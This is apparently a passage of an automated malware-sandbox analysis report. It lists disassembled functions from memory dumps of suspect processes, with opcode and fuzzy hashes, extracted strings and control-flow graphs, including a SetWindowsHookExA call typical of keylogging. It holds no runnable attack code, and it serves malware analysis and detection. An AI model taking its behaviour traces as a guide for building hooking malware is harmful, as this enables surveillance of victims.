                                                          • Opcode Fuzzy Hash: 26fc56d1454d409bcbf227fb2e8e3ef4dd734f4c8bb693b213db96849c6d5ab5
                                                          • Instruction Fuzzy Hash: D5018875905228AFDB60DF68C885BD8BBB4BB49305F5082DAD50DE6290CB31AA898F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D0B59 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5222cc10c25e9d765d71b330ff0162832f4631fe36881cd9fc57ce5e49ea770
                                                          • Instruction ID: 758dfba17504a50da3c91faeed4d90b9fab1bf770ef467369f4127501ae1057b
                                                          • Opcode Fuzzy Hash: f5222cc10c25e9d765d71b330ff0162832f4631fe36881cd9fc57ce5e49ea770
                                                          • Instruction Fuzzy Hash: ADF0677495D229CFCB15CFA1E8446E9B7B8FB4A31AF1021A7844AE2211D7304A84DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00340F68 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 283ece287508a1548be801e52e5b4d83695def7eb4288430141d37ac5479364f
                                                          • Instruction ID: ddbd5b38411ac7c7a71d543d1cdd39190b065a60037d2626f802cac7fa5e62c4
                                                          • Opcode Fuzzy Hash: 283ece287508a1548be801e52e5b4d83695def7eb4288430141d37ac5479364f
                                                          • Instruction Fuzzy Hash: B4E0923034D3819FD72B8720AC2AB227BB49B42740F1541AFD6459F1D2C9E62809C612
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00343DCB Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac1e89b3b5bf42e2e24ced1f67c4444e6d7298c6303075fdf5372cc348bef9b1
                                                          • Instruction ID: 6035d3288f2200353d1e9f12676d864a7df834e87a7acb2f697a5fd20c87066b
                                                          • Opcode Fuzzy Hash: ac1e89b3b5bf42e2e24ced1f67c4444e6d7298c6303075fdf5372cc348bef9b1
                                                          • Instruction Fuzzy Hash: E9E0862151E3E5AFCB0BE32854A6099BFB8AD0366474800CBE8858F193CE041E158396
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034D700 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 254c7a959a43f920204a6061aab627c12f1b63d6c57b600b206662d4ab4d7704
                                                          • Instruction ID: 5e9cd6c122025f152d9714309482ca54245ce71dcc851a5d30b02240d2243533
                                                          • Opcode Fuzzy Hash: 254c7a959a43f920204a6061aab627c12f1b63d6c57b600b206662d4ab4d7704
                                                          • Instruction Fuzzy Hash: 2FF03970D00308DFCB01DFA8D840AAEBBF5FB08301F1085AAD818A3310D7309A50CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00340F78 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f84b69bed3dd300b32c74a27fa5896bab461954447ec27362f0ed07c21277fba
                                                          • Instruction ID: bdc44201ccd154337b4391a32a994e55fd0f3579fdd6a7caa357a3427aa78341
                                                          • Opcode Fuzzy Hash: f84b69bed3dd300b32c74a27fa5896bab461954447ec27362f0ed07c21277fba
                                                          • Instruction Fuzzy Hash: 95E08C30380304AFEA299664AC1BB3672ED97C4B40F65803963059F2C4DEF1BC00C925
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00345344 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d5511810d130d0d9b00eac9784593bcbf55a8048d481ad69c94cb4459623267
                                                          • Instruction ID: cc33a1fc2713750e1b9119d10d79ab828747f298d905835ae565a800aa1aae98
                                                          • Opcode Fuzzy Hash: 6d5511810d130d0d9b00eac9784593bcbf55a8048d481ad69c94cb4459623267
                                                          • Instruction Fuzzy Hash: 54E0E538A40250DFD712CB18C9AAF69BBF5BF05705F2582E9E915AF2E2C374E841CA15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D0304 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a256f8e800cbb17f94b59296dd7e1b968545c1c0bb70d966739ebd1441b6d9d1
                                                          • Instruction ID: cee03ce763ed3790d187f49b83e2c54312165987a9b998a0aba3c25025fff103
                                                          • Opcode Fuzzy Hash: a256f8e800cbb17f94b59296dd7e1b968545c1c0bb70d966739ebd1441b6d9d1
                                                          • Instruction Fuzzy Hash: 45E0E5354092598FCB15DB50D8547E4BBB5BB0A314F1482D7C8499B3A6D7319A85DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00349878 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 267f3a4014013e465d296e6a682ef390c34542664997f57df9e50feea445ce5f
                                                          • Instruction ID: 7b9167086f15405df7e695f8270ed61d771c3edca1907a66b9e530e8d6601691
                                                          • Opcode Fuzzy Hash: 267f3a4014013e465d296e6a682ef390c34542664997f57df9e50feea445ce5f
                                                          • Instruction Fuzzy Hash: BAE0DF3114D3849FEB238BA4A856A623BA8AB83740B2D81EFE4114F4E2C6A22405CB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00340AE0 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c66ca4ef775baacdb6989da3ba0b68769dda96b6e207b527b15b73751f30e3c6
                                                          • Instruction ID: f14224033b18bd32b08db8bbeea88963c675d89d01f2d9fd62702a22be39df8d
                                                          • Opcode Fuzzy Hash: c66ca4ef775baacdb6989da3ba0b68769dda96b6e207b527b15b73751f30e3c6
                                                          • Instruction Fuzzy Hash: CAD05B3571062447CB097775641977EBA56DBC7755B00403CEB068B342DF395D5147C9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D06C3 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d3421663e9090c311e616460eb28561ffe647a36eb28879a9eb766f0c39e74b
                                                          • Instruction ID: 90ef927457029e75f50ae41a74b51a0ab4a94053c5e5d67a25091806e5371c8c
                                                          • Opcode Fuzzy Hash: 9d3421663e9090c311e616460eb28561ffe647a36eb28879a9eb766f0c39e74b
                                                          • Instruction Fuzzy Hash: 8EE0C239A09218CFDB60CFA0D880BECBBB5EB49304F24809A9509AB291C2319A81DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D0E39 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 118db3ffdc7c7806275faa82824ce084667f851d8e8a576e48cd813ff76c289c
                                                          • Instruction ID: 758db10310a3f1739fc7446bf00fad160e171a3163103d4d075345edfacb324f
                                                          • Opcode Fuzzy Hash: 118db3ffdc7c7806275faa82824ce084667f851d8e8a576e48cd813ff76c289c
                                                          • Instruction Fuzzy Hash: 81E0E5749143889FC746EFB8A85439C7FB0AB45201F1446E6D889D7252E6355A44CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00349888 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36d761bcf388b5801312c2a0816aa5734492b04d3c7ed4e54d6cf21bb70f880a
                                                          • Instruction ID: 4917faddb2fc8375c3b7a72cdf1a3500045f0fdd8ccb8f7529d1cfcbf45ec7f9
                                                          • Opcode Fuzzy Hash: 36d761bcf388b5801312c2a0816aa5734492b04d3c7ed4e54d6cf21bb70f880a
                                                          • Instruction Fuzzy Hash: 71D02B303043489FE7120B68D80BB373BDDA7C2780F6DC06AB0154D595CFA2AC00C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D0EB9 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f03388fbd89297d3863a465294385db27a75e76d0a08f4219bcb4c6cddb42f1
                                                          • Instruction ID: 93ff77147165d61013b7d09ce67b88d3f070937a4b0fdae97c3af88a2f49032b
                                                          • Opcode Fuzzy Hash: 6f03388fbd89297d3863a465294385db27a75e76d0a08f4219bcb4c6cddb42f1
                                                          • Instruction Fuzzy Hash: 89E0C231409348DFC713EF6488113583F34EF42305F0500DBD80867252D7354E04C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D0E48 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65184de161ab336147326e042972e1460fa4868b438ab574194cdfd58cdea5e2
                                                          • Instruction ID: ae4ba71ea4b1a54c7ed258e4b642f83700829adf2e50f276f430fba1476bf7a5
                                                          • Opcode Fuzzy Hash: 65184de161ab336147326e042972e1460fa4868b438ab574194cdfd58cdea5e2
                                                          • Instruction Fuzzy Hash: 6EE0E270D10308EFCB44EFA8E88939CBBB8BB04301F1046AAC84993350E7306A41CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00343DE4 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bd03d92f2f4cd56eb62fe8dbf13d64444b28d3663cb6d45a37a1ee002853359
                                                          • Instruction ID: 7282ad911bb8503916c20dcf37813e0059fe431c447656ac1fca5a42ef82f47b
                                                          • Opcode Fuzzy Hash: 6bd03d92f2f4cd56eb62fe8dbf13d64444b28d3663cb6d45a37a1ee002853359
                                                          • Instruction Fuzzy Hash: 54C08C2274927C23082B315C70624BEA5EC8A82B213A00466F50A8F682CD806F0083CA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D083D Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14530c02c137996e9261cbf27b87052f6e9543ab3945fcd5f94c0e148433bf5c
                                                          • Instruction ID: 2548964c48fb6dec2556185592ef4edc63afc35f499565df48a5b6579ed658ce
                                                          • Opcode Fuzzy Hash: 14530c02c137996e9261cbf27b87052f6e9543ab3945fcd5f94c0e148433bf5c
                                                          • Instruction Fuzzy Hash: C6E046388042188FCB10CF50D844BE8BBB0BB08304F1481DAC409A33A2C7329A86DF00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D0EC8 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d1627780fc41f9e0ed5d2b2545cbd014b4e769ad89033843a22f97c84f1a972
                                                          • Instruction ID: 30e5abf4dd65b3f771399709857fa139ec0a26d20b8d11811825cb0e333d8bc0
                                                          • Opcode Fuzzy Hash: 6d1627780fc41f9e0ed5d2b2545cbd014b4e769ad89033843a22f97c84f1a972
                                                          • Instruction Fuzzy Hash: 10D0C931805208DBC725EBA9D5157697769EB81305F1405EAD80863251DB765D41CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034B6B0 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78578b515b425ae459acbc5c4a9eba35eb7721f1d2f2aa246c3a316f89239b7f
                                                          • Instruction ID: 70bc5fbc786f99722078fd1a1a5211bab875684a55a323af2e5124e7f418ff14
                                                          • Opcode Fuzzy Hash: 78578b515b425ae459acbc5c4a9eba35eb7721f1d2f2aa246c3a316f89239b7f
                                                          • Instruction Fuzzy Hash: BDC080704043089BD311EFB8DC587297FECD706311F5100D5D40CC3120DB315544D7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D0677 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5661246cb82612c1600bd9eb71e4f6670b02692db3873355e1fda748a092d281
                                                          • Instruction ID: 9cf29011842fa07f5c33cd2e65b8486bcfe603a35f28e23e04c986c68f4799dd
                                                          • Opcode Fuzzy Hash: 5661246cb82612c1600bd9eb71e4f6670b02692db3873355e1fda748a092d281
                                                          • Instruction Fuzzy Hash: 33D0C97580E208CFCB51BB6095583E877B8F759309F1420EB9409C6302D2309950DF20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D03E9 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa95328e6b1439f9f42bbf5515b7d45460ff49af9217cdfc29dbb9c933bc6ced
                                                          • Instruction ID: e2e07cd69744fb50f3ca29d55a476a69677a13094f20965f2200d04b4b246f00
                                                          • Opcode Fuzzy Hash: fa95328e6b1439f9f42bbf5515b7d45460ff49af9217cdfc29dbb9c933bc6ced
                                                          • Instruction Fuzzy Hash: 39C0EA7894925CCBDB24DB65E844AECBBB9BB0A304F1051DBD80AA7311D6716A819F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 00349BB8 Relevance: 16.5, Strings: 13, Instructions: 262COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$XXp$XXp$XXp$XXp$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-748399701
                                                          • Opcode ID: e105b1cc4812fe8c3e19b4d9cef151b21dbbdd25951dad0bfb9199e45ed4dea8
                                                          • Instruction ID: 879154db0fe3d115d72d40e089e9dcb673138018161f91474f2742099460023f
                                                          • Opcode Fuzzy Hash: e105b1cc4812fe8c3e19b4d9cef151b21dbbdd25951dad0bfb9199e45ed4dea8
                                                          • Instruction Fuzzy Hash: 9EA17E30E04248CFDB1ADB98D445BAEBBF6EB85301F258467E512AF695CB70AC45CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00349D0F Relevance: 12.7, Strings: 10, Instructions: 207COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$XXp$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-355809937
                                                          • Opcode ID: fbb1f25a83bd89c8494a0b47054ec45c6604438471667df5d1804f3788e2c18b
                                                          • Instruction ID: 80f5fc21b33e4ccc98ae3a3ed38c45f0049b80320bf4cd43a3b572ee6a0c8674
                                                          • Opcode Fuzzy Hash: fbb1f25a83bd89c8494a0b47054ec45c6604438471667df5d1804f3788e2c18b
                                                          • Instruction Fuzzy Hash: 8681AF30E04248CFDB1ACB98C444BAEBBF6BF85301F698467E4129F695CB70AC45DB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00349D63 Relevance: 10.2, Strings: 8, Instructions: 175COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3004817860
                                                          • Opcode ID: 5e2a96db5e265f719a5fc0d802cdec771f7d6d0eed7b1b52ce2cbc41bdea89a5
                                                          • Instruction ID: 6fc7d7167268ab4a7be7fe03195d3df6d29355301e4345f6d6b0e6370902b7c3
                                                          • Opcode Fuzzy Hash: 5e2a96db5e265f719a5fc0d802cdec771f7d6d0eed7b1b52ce2cbc41bdea89a5
                                                          • Instruction Fuzzy Hash: 32614B30E04208CFDB2ADB98D445BAEB7F6BF85301F698167E412AF695CB70AC41DB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:11.3%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 16685 469ff8 16686 46a03c SetWindowsHookExA 16685->16686 16688 46a082 16686->16688

                                                          Executed Functions

                                                          Function 001CF360 Relevance: 10.5, Strings: 8, Instructions: 545COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 1cf360-1cf381 1 1cf383-1cf386 0->1 2 1cf38c-1cf3ab 1->2 3 1cfb27-1cfb2a 1->3 12 1cf3ad-1cf3b0 2->12 13 1cf3c4-1cf3ce 2->13 4 1cfb2c-1cfb4b 3->4 5 1cfb50-1cfb52 3->5 4->5 6 1cfb59-1cfb5c 5->6 7 1cfb54 5->7 6->1 10 1cfb62-1cfb6b 6->10 7->6 12->13 15 1cf3b2-1cf3c2 12->15 18 1cf3d4-1cf3ef call 1c64dc 13->18 15->18 21 1cf3fc-1cf6d9 18->21 22 1cf3f1-1cf3f7 18->22 43 1cf6df-1cf78e 21->43 44 1cfb19-1cfb26 21->44 22->10 53 1cf7b7 43->53 54 1cf790-1cf7b5 43->54 56 1cf7c0-1cf7c9 call 1c64e8 53->56 54->56 58 1cf7ce-1cf7d3 56->58 59 1cf7d9-1cf7fb call 1c64f4 58->59 60 1cfb00-1cfb0c 58->60 59->60 64 1cf801-1cf80b 59->64 60->43 62 1cfb12 60->62 62->44 64->60 65 1cf811-1cf81c 64->65 65->60 66 1cf822-1cf8f8 call 1c0174 * 2 65->66 80 1cf8fa-1cf8fc 66->80 81 1cf906-1cf936 call 1c0174 66->81 80->81 86 1cf938-1cf93a 81->86 87 1cf944-1cf950 81->87 86->87 88 1cf9b0-1cf9b4 87->88 89 1cf952-1cf956 87->89 90 1cf9ba-1cf9f6 call 1c0174 88->90 91 1cfaf1-1cfafa 88->91 89->88 92 1cf958-1cf982 call 1c0174 89->92 106 1cf9f8-1cf9fa 90->106 107 1cfa04-1cfa12 90->107 91->60 91->66 101 1cf984-1cf986 92->101 102 1cf990-1cf9ad call 1c6500 92->102 101->102 102->88 106->107 109 1cfa29-1cfa34 107->109 110 1cfa14-1cfa1f 107->110 114 1cfa4c-1cfa5d 109->114 115 1cfa36-1cfa3c 109->115 110->109 113 1cfa21 110->113 113->109 119 1cfa5f-1cfa65 114->119 120 1cfa75-1cfa81 114->120 116 1cfa3e 115->116 117 1cfa40-1cfa42 115->117 116->114 117->114 121 1cfa69-1cfa6b 119->121 122 1cfa67 119->122 124 1cfa99-1cfaea 120->124 125 1cfa83-1cfa89 120->125 121->120 122->120 124->91 126 1cfa8d-1cfa8f 125->126 127 1cfa8b 125->127 126->124 127->124
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0.K$$p$$p$$p$$p$$p$$p$.K
                                                          • API String ID: 0-1383128878
                                                          • Opcode ID: 573545cecd6177f69f7fc40f7206777bcda10ec4af57ab081d8b067954dfb6e6
                                                          • Instruction ID: 96f427df232dad71eb75c793b290f0dfb69cfcac3658844d937d0a7d47d5f62c
                                                          • Opcode Fuzzy Hash: 573545cecd6177f69f7fc40f7206777bcda10ec4af57ab081d8b067954dfb6e6
                                                          • Instruction Fuzzy Hash: 1C321F31E1075A8BCB14EB75C854AADF7B2BFD9300F60966ED409A7264EB70DD85CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CE551 Relevance: 6.0, Strings: 4, Instructions: 1040COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: &K$0,K$0,K$.K
                                                          • API String ID: 0-1401689606
                                                          • Opcode ID: b5ca5e03170c3dccb94513984f9912164f49a7193ffd11361ccc6f825b19a823
                                                          • Instruction ID: 51edc4f881fe72d5cefee9863a96039fc2f66abdc5c0a0409489eda672eeaeb2
                                                          • Opcode Fuzzy Hash: b5ca5e03170c3dccb94513984f9912164f49a7193ffd11361ccc6f825b19a823
                                                          • Instruction Fuzzy Hash: D8A20234A002088FDB64DB68C584FADBBF2FB99314F5584A9D409AB361DB35ED86CF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8C00 Relevance: 2.8, Instructions: 2814COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c7248ce29100bb0c2b7757da34248ed9ec1fa4ce2e9e440e6b4b92d2b85b6d3
                                                          • Instruction ID: eb0268a4a24c24ec851d34837427bb4701514720a999b41257e9334edfcd7da6
                                                          • Opcode Fuzzy Hash: 3c7248ce29100bb0c2b7757da34248ed9ec1fa4ce2e9e440e6b4b92d2b85b6d3
                                                          • Instruction Fuzzy Hash: 62530931C10B1A8ACB51EF68C884A99F7B1FF99300F15C79AE45977121EB70AAD5CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CBE88 Relevance: 2.3, Instructions: 2310COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
